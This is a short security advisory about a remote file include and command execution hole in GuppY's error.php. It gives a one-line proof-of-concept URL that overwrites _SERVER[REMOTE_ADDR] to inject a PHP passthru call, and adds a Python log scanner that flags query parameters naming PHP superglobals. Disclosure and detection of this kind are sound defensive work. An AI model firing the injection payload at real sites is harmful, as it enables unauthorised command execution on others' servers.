GuppY Error.PHP Remote File Include and Command Execution Vulnerability

An exploit is not required.

Proof-of-concept examples are available:
http://www.example.com/[path_to_guppy]/error.php?err=hacker&_SERVER=&_SERVER[REMOTE_ADDR]=";passthru("ls -la>README");echo"
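
A log check for the request pattern in the proof of concept above, added here as a defender-side example; it is not part of the original advisory. It flags query parameters whose names target PHP superglobals such as `_SERVER`. The log lines are constructed, and the `/guppy/` path and all function names are assumptions.

```python
import re
from urllib.parse import unquote_plus

# PHP superglobal names that a request parameter should never carry.
SUPERGLOBALS = {"GLOBALS", "_SERVER", "_GET", "_POST", "_COOKIE",
                "_FILES", "_ENV", "_REQUEST", "_SESSION"}
# Client address and request target from a common-log-format line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_fully(text, rounds=3):
    """Percent-decode repeatedly so %5F and %255F both become '_'."""
    for _ in range(rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text

def superglobal_params(request_target):
    """Return the query parameter names that address a PHP superglobal."""
    query = request_target.partition("?")[2]
    hits = []
    for pair in query.split("&"):
        name = decode_fully(pair.split("=", 1)[0])
        # PHP converts dots and spaces in incoming names to underscores.
        base = name.lstrip().replace(".", "_").replace(" ", "_").split("[", 1)[0]
        if base in SUPERGLOBALS and name not in hits:
            hits.append(name)
    return hits

def scan(lines):
    """Return (client, request_target, flagged_names) for suspicious lines."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if m and (hits := superglobal_params(m.group(2))):
            findings.append((m.group(1), m.group(2), hits))
    return findings

# Constructed sample log lines (documentation addresses, placeholder values).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /guppy/index.php?lng=en HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2010:10:00:05 +0000] "GET /guppy/error.php?err=hacker&_SERVER=&_SERVER[REMOTE_ADDR]=x HTTP/1.1" 200 311',
    '192.0.2.44 - - [01/Jan/2010:10:00:09 +0000] "GET /guppy/error.php?err=404&%5FSERVER%5BREMOTE_ADDR%5D=x HTTP/1.1" 200 311',
    '192.0.2.10 - - [01/Jan/2010:10:01:00 +0000] "GET /guppy/error.php?err=404&server=1 HTTP/1.1" 200 298',
]

if __name__ == "__main__":
    for client, target, names in scan(SAMPLE_LOG):
        print(client, names, target)
```

The check covers query strings only; the same name test applies to POST bodies and cookies where those are logged.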


 

Copyright 2010, SecurityFocus